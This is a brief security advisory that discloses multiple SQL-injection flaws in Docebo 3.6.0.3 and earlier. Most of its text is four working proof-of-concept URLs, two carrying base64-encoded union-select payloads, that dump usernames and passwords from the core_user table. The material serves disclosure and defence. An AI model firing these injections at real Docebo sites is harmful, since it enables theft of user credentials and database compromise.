Docebo <=3.6.0.3 is prone to multiple SQL-injection vulnerabilities as it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
POC 1
roland@hp6720s:~$ echo -n "' union select userid,pass from core_user -- " | base64
JyB1bmlvbiBzZWxlY3QgdXNlcmlkLHBhc3MgZnJvbSBjb3JlX3VzZXIgLS0g
http://localhost/docebo/doceboLms/index.php?modname=faq&op=play&mode=help&word=JyB1bmlvbiBzZWxlY3QgdXNlcmlkLHBhc3MgZnJvbSBjb3JlX3VzZXIgLS0g
POC 2
roland@hp6720s:~$ echo -n "' union select 1,userid,pass from core_user -- " | base64
JyB1bmlvbiBzZWxlY3QgMSx1c2VyaWQscGFzcyBmcm9tIGNvcmVfdXNlciAtLSA=
http://localhost/docebo/doceboLms/index.php?modname=link&op=play&mode=keyw&word=JyB1bmlvbiBzZWxlY3QgMSx1c2VyaWQscGFzcyBmcm9tIGNvcmVfdXNlciAtLSA=
POC 3
http://localhost/docebo/doceboCore/index.php?modname=meta_certificate&op=elemmetacertificate&id_certificate=3222 union select concat (userid,0x3d,pass),2,3 from core_user limit 1,2
POC 4
http://localhost/docebo/doceboCore/index.php?modname=certificate&op=elemcertificate&id_certificate=1123 union select concat(userid,0x3d,pass),2,3 from core_user limit 1,2
BID: http://www.securityfocus.com/bid/36654/info